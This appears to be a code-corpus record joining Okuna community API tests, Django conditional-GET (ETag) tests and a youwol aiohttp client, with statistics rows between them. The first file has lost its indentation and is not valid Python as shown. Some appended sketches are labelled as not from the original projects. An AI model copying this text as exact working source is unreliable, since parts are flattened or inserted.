def test_can_delete_administrated_community_rules(self):
"""
should be able to delete the administrated community rules and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'rules': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.rules)
def test_can_delete_administrated_community_user_adjective(self):
"""
should be able to delete the administrated community user_adjective and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'user_adjective': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.user_adjective)
def test_can_delete_administrated_community_users_adjective(self):
"""
should be able to delete the administrated community users_adjective and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'users_adjective': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.users_adjective)
def test_can_update_administrated_community_categories(self):
"""
should be able to update the administrated community categories and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_categories = []
for i in range(settings.COMMUNITY_CATEGORIES_MIN_AMOUNT, settings.COMMUNITY_CATEGORIES_MAX_AMOUNT):
category = make_category()
new_categories.append(category)
data = {
'categories': ','.join(category.name for category in new_categories)
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
categories = community.categories.all()
categories_ids = [category.pk for category in categories]
self.assertEqual(len(categories), len(new_categories))
for new_category in new_categories:
self.assertIn(new_category.pk, categories_ids)
def test_cannot_delete_administrated_community_categories(self):
"""
should not be able to delete the administrated community categories and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'categories': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertTrue(community.categories.exists())
def test_creator_can_delete_community(self):
"""
should be able to delete a created community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(Community.objects.filter(pk=community.pk).exists())
def test_admin_cannot_delete_community(self):
"""
should not be able to delete a merely administrated community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_moderator_cannot_delete_community(self):
"""
should not be able to delete a merely moderated community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_member_cannot_delete_community(self):
"""
should not be able to delete a joined community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_user_cannot_delete_community(self):
"""
should not be able to delete a community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_cannot_retrieve_soft_deleted_community(self):
"""
should not be able to retrieve a soft deleted community and return 403
"""
global_moderator = make_global_moderator()
user = make_user()
headers = make_authentication_headers_for_user(user)
community_owner = make_user()
community = make_community(creator=community_owner)
community_name = community.name
community_reporter = make_user()
moderation_category = make_moderation_category()
community_reporter.report_community(community=community, category_id=moderation_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=moderation_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def _get_url(self, community_name):
return reverse('community', kwargs={
'community_name': community_name
})
class CommunityAvatarAPITests(OpenbookAPITestCase):
"""
CommunityAvatarAPITests
"""
def test_can_update_administrated_community_avatar(self):
"""
should be able to update the avatar of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.avatar = None
community.save()
new_avatar = make_community_avatar()
data = {
'avatar': new_avatar
}
url = self._get_url(community_name=community.name)
response = self.client.put(url, data, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertIsNotNone(community.avatar)
def test_can_delete_administrated_community_avatar(self):
"""
should be able to delete the avatar of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.avatar.save('avatar.jpg', File(make_community_avatar()))
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.avatar)
def _get_url(self, community_name):
return reverse('community-avatar', kwargs={
'community_name': community_name
})
class CommunityCoverAPITests(OpenbookAPITestCase):
"""
CommunityCoverAPITests
"""
def test_can_update_administrated_community_cover(self):
"""
should be able to update the cover of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.cover = None
community.save()
new_cover = make_community_cover()
data = {
'cover': new_cover
}
url = self._get_url(community_name=community.name)
response = self.client.put(url, data, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertIsNotNone(community.cover)
def test_can_delete_administrated_community_cover(self):
"""
should be able to delete the cover of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.cover.save('cover.jpg', File(make_community_cover()))
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.cover)
def _get_url(self, community_name):
return reverse('community-cover', kwargs={
'community_name': community_name
})
class FavoriteCommunityAPITests(OpenbookAPITestCase):
"""
FavoriteCommunityAPITests
"""
def test_cant_favorite_not_joined_community(self):
"""
should not be able to favorite a community not joined
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def test_can_favorite_joined_community(self):
"""
should be able to favorite a joined community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(user.has_favorite_community_with_name(community.name))
def test_cant_favorite_already_favorite_community(self):
"""
should not be able to favorite an already favorite community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
user.favorite_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user.has_favorite_community_with_name(community.name))
def test_can_unfavorite_favorite_community(self):
"""
should be able to unfavorite a favorite community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
user.favorite_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def test_cant_unfavorite_not_favorite_community(self):
"""
should not be able to unfavorite a non favorite community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def _get_url(self, community_name):
return reverse('favorite-community', kwargs={
'community_name': community_name
})
class ExcludeTopPostsCommunityAPITests(OpenbookAPITestCase):
"""
ExcludeTopPostsCommunityAPITests
"""
def test_can_exclude_community(self):
"""
should be able to exclude a community from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_exclude_private_community(self):
"""
should not be able to exclude a private community from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type=Community.COMMUNITY_TYPE_PRIVATE)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_exclude_community_already_excluded(self):
"""
should not be able to exclude a community if already excluded from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.exclude_community_with_name_from_top_posts(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_can_remove_excluded_community(self):
"""
should be able to remove a community exclusion
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.exclude_community_with_name_from_top_posts(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_remove_exclusion_for_community_if_not_excluded(self):
"""
should not be able to remove a community exclusion, if the community is not excluded in the first place
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def _get_url(self, community_name):
return reverse('legacy-exclude-community-from-top-posts', kwargs={
'community_name': community_name
})
class SubscribeToCommunityNotificationsAPITests(OpenbookAPITestCase):
def test_should_be_able_to_subscribe_to_notifications_for_community_if_member(self):
"""
should be able to subscribe to community posts for a community if a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
subscription = CommunityNotificationsSubscription.objects.get(subscriber=community_member)
self.assertEqual(subscription.community.name, community.name)
self.assertTrue(subscription.new_post_notifications)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_not_member(self):
"""
should not be able to subscribe to community posts for a community if not a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_banned(self):
"""
should not be able to subscribe to community posts for a community if banned
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
user.join_community_with_name(community_name=community.name)
admin.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_already_subscribed(self):
"""
should not be able to subscribe to community posts for a community if already subscribed
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
community_member.enable_new_post_notifications_for_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
subscriptions = CommunityNotificationsSubscription.objects.filter(subscriber=community_member, community=community)
self.assertEqual(len(subscriptions), 1)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_be_able_to_unsubscribe_to_notifications_for_community_if_member(self):
"""
should be able to unsubscribe from community posts for a community if a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
community_member.enable_new_post_notifications_for_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(CommunityNotificationsSubscription.objects.get(
subscriber=community_member, community=community).new_post_notifications)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_not_member(self):
"""
should not be able to unsubscribe from community posts for a community if not a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_banned(self):
"""
should not be able to unsubscribe from community posts for a community if banned
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
user.join_community_with_name(community_name=community.name)
user.enable_new_post_notifications_for_community_with_name(community_name=community.name)
admin.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_not_subscribed(self):
"""
should not be able to unsubscribe from community posts for a community if already unsubscribed
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
subscriptions = CommunityNotificationsSubscription.objects.filter(
subscriber=community_member, community=community)
self.assertEqual(len(subscriptions), 0)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def _get_url(self, community_name):
return reverse('subscribe-community-new-post-notifications', kwargs={
'community_name': community_name
})
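# ---------------------------------------------------------------------------
# Illustrative sketch, not from the okuna-api codebase: a urls.py entry of
# roughly this shape is what reverse('subscribe-community-new-post-notifications',
# ...) and the other _get_url helpers above resolve against. The view class
# name is a hypothetical placeholder.
#
# from django.urls import path
# urlpatterns = [
#     path('<str:community_name>/notifications/subscribe/',
#          SubscribeCommunityNewPostNotificationsView.as_view(),
#          name='subscribe-community-new-post-notifications'),
# ]
# ---------------------------------------------------------------------------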
# ============================================================================
# tests/conditional_processing/tests.py
# repo: bpeschier/django @ f54c0ec06e390dc5bce95fdccbcb51d6423da4f9
# blob: 7cbe378be893ab25ea61bd56e71f313d3297f3d3 | 9,145 bytes | license: BSD-3-Clause
# ============================================================================
# -*- coding:utf-8 -*-
from __future__ import unicode_literals

from datetime import datetime

from django.test import TestCase, override_settings

FULL_RESPONSE = 'Test conditional get response'
LAST_MODIFIED = datetime(2007, 10, 21, 23, 21, 47)
LAST_MODIFIED_STR = 'Sun, 21 Oct 2007 23:21:47 GMT'
LAST_MODIFIED_NEWER_STR = 'Mon, 18 Oct 2010 16:56:23 GMT'
LAST_MODIFIED_INVALID_STR = 'Mon, 32 Oct 2010 16:56:23 GMT'
EXPIRED_LAST_MODIFIED_STR = 'Sat, 20 Oct 2007 23:21:47 GMT'
ETAG = 'b4246ffc4f62314ca13147c9d4f76974'
EXPIRED_ETAG = '7fae4cd4b0f81e7d2914700043aa8ed6'


@override_settings(ROOT_URLCONF='conditional_processing.urls')
class ConditionalGet(TestCase):

    def assertFullResponse(self, response, check_last_modified=True, check_etag=True):
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, FULL_RESPONSE.encode())
        if check_last_modified:
            self.assertEqual(response['Last-Modified'], LAST_MODIFIED_STR)
        if check_etag:
            self.assertEqual(response['ETag'], '"%s"' % ETAG)

    def assertNotModified(self, response):
        self.assertEqual(response.status_code, 304)
        self.assertEqual(response.content, b'')

    def test_without_conditions(self):
        response = self.client.get('/condition/')
        self.assertFullResponse(response)

    def test_if_modified_since(self):
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.get('/condition/')
        self.assertNotModified(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
        response = self.client.get('/condition/')
        self.assertNotModified(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        response = self.client.get('/condition/')
        self.assertFullResponse(response)

    def test_if_unmodified_since(self):
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        response = self.client.get('/condition/')
        self.assertEqual(response.status_code, 412)

    def test_if_none_match(self):
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/')
        self.assertNotModified(response)
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        # Several etags in If-None-Match is a bit exotic but why not?
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s", "%s"' % (ETAG, EXPIRED_ETAG)
        response = self.client.get('/condition/')
        self.assertNotModified(response)

    def test_if_match(self):
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
        response = self.client.put('/condition/etag/')
        self.assertEqual(response.status_code, 200)
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.put('/condition/etag/')
        self.assertEqual(response.status_code, 412)

    def test_both_headers(self):
        # see http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.3.4
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/')
        self.assertNotModified(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/')
        self.assertFullResponse(response)

    def test_both_headers_2(self):
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/')
        self.assertFullResponse(response)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/')
        self.assertEqual(response.status_code, 412)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/')
        self.assertEqual(response.status_code, 412)
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/')
        self.assertEqual(response.status_code, 412)

    def test_single_condition_1(self):
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified/')
        self.assertNotModified(response)
        response = self.client.get('/condition/etag/')
        self.assertFullResponse(response, check_last_modified=False)

    def test_single_condition_2(self):
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/etag/')
        self.assertNotModified(response)
        response = self.client.get('/condition/last_modified/')
        self.assertFullResponse(response, check_etag=False)

    def test_single_condition_3(self):
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified/')
        self.assertFullResponse(response, check_etag=False)

    def test_single_condition_4(self):
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
        response = self.client.get('/condition/etag/')
        self.assertFullResponse(response, check_last_modified=False)

    def test_single_condition_5(self):
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified2/')
        self.assertNotModified(response)
        response = self.client.get('/condition/etag2/')
        self.assertFullResponse(response, check_last_modified=False)

    def test_single_condition_6(self):
        self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
        response = self.client.get('/condition/etag2/')
        self.assertNotModified(response)
        response = self.client.get('/condition/last_modified2/')
        self.assertFullResponse(response, check_etag=False)

    def test_single_condition_7(self):
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified/')
        self.assertEqual(response.status_code, 412)
        response = self.client.get('/condition/etag/')
        self.assertFullResponse(response, check_last_modified=False)

    def test_single_condition_8(self):
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified/')
        self.assertFullResponse(response, check_etag=False)

    def test_single_condition_9(self):
        self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
        response = self.client.get('/condition/last_modified2/')
        self.assertEqual(response.status_code, 412)
        response = self.client.get('/condition/etag2/')
        self.assertFullResponse(response, check_last_modified=False)

    def test_single_condition_head(self):
        self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
        response = self.client.head('/condition/')
        self.assertNotModified(response)

    def test_invalid_etag(self):
        self.client.defaults['HTTP_IF_NONE_MATCH'] = r'"\"'
        response = self.client.get('/condition/etag/')
        self.assertFullResponse(response, check_last_modified=False)
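
# ---------------------------------------------------------------------------
# Hedged sketch (not part of this test file): the URLconf and views exercised
# above are not shown in this record. Views compatible with these tests could
# be built with Django's conditional-response decorators; the function names
# `index`, `with_etag` and `with_last_modified` are assumptions, not the
# actual conditional_processing test app.
# ---------------------------------------------------------------------------
from django.http import HttpResponse
from django.views.decorators.http import condition, etag, last_modified


@condition(etag_func=lambda request: ETAG,
           last_modified_func=lambda request: LAST_MODIFIED)
def index(request):
    # The full body is sent only when the conditional headers do not match.
    return HttpResponse(FULL_RESPONSE)


@etag(lambda request: ETAG)                    # would back /condition/etag/
def with_etag(request):
    return HttpResponse(FULL_RESPONSE)


@last_modified(lambda request: LAST_MODIFIED)  # would back /condition/last_modified/
def with_last_modified(request):
    return HttpResponse(FULL_RESPONSE)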
| 46.897436
| 88
| 0.701804
| 1,083
| 9,145
| 5.651893
| 0.102493
| 0.129064
| 0.147035
| 0.143767
| 0.849371
| 0.838262
| 0.819311
| 0.807221
| 0.781898
| 0.755922
| 0
| 0.02193
| 0.177255
| 9,145
| 194
| 89
| 47.139175
| 0.7916
| 0.016184
| 0
| 0.704403
| 0
| 0
| 0.192504
| 0.091415
| 0
| 0
| 0
| 0
| 0.295597
| 1
| 0.125786
| false
| 0
| 0.018868
| 0
| 0.150943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cd45e09ad6e764c003bebf43e4acdb421f560f2
| 3,922
|
py
|
Python
|
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | null | null | null |
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | 1
|
2022-03-14T09:40:15.000Z
|
2022-03-14T09:40:15.000Z
|
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass, field
from typing import Dict

import aiohttp

from youwol_utils.clients.utils import raise_exception_from_response


@dataclass(frozen=True)
class FluxClient:

    url_base: str

    headers: Dict[str, str] = field(default_factory=lambda: {})

    # NB: this connector is created once at class-definition time and is never
    # handed to the sessions below; every call opens and closes its own
    # ClientSession with the default connector.
    connector = aiohttp.TCPConnector(verify_ssl=False)

    async def get_projects(self, **kwargs):
        url = f"{self.url_base}/projects"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.get(url=url, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def create_project(self, body, **kwargs):
        url = f"{self.url_base}/projects/create"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.post(url=url, json=body, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def update_project(self, project_id, body, **kwargs):
        url = f"{self.url_base}/projects/{project_id}"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.post(url=url, json=body, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def get_project(self, project_id: str, **kwargs):
        url = f"{self.url_base}/projects/{project_id}"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.get(url=url, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def delete_project(self, project_id: str, **kwargs):
        url = f"{self.url_base}/projects/{project_id}"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.delete(url=url, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def get_records(self, body, **kwargs):
        url = f"{self.url_base}/records"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.post(url=url, json=body, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def update_metadata(self, project_id: str, body, **kwargs):
        url = f"{self.url_base}/projects/{project_id}/metadata"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.post(url=url, json=body, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)

    async def get_metadata(self, project_id: str, **kwargs):
        url = f"{self.url_base}/projects/{project_id}/metadata"
        async with aiohttp.ClientSession(headers=self.headers) as session:
            async with await session.get(url=url, **kwargs) as resp:
                if resp.status == 200:
                    resp = await resp.json()
                    return resp
                await raise_exception_from_response(resp, **kwargs)
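
# ---------------------------------------------------------------------------
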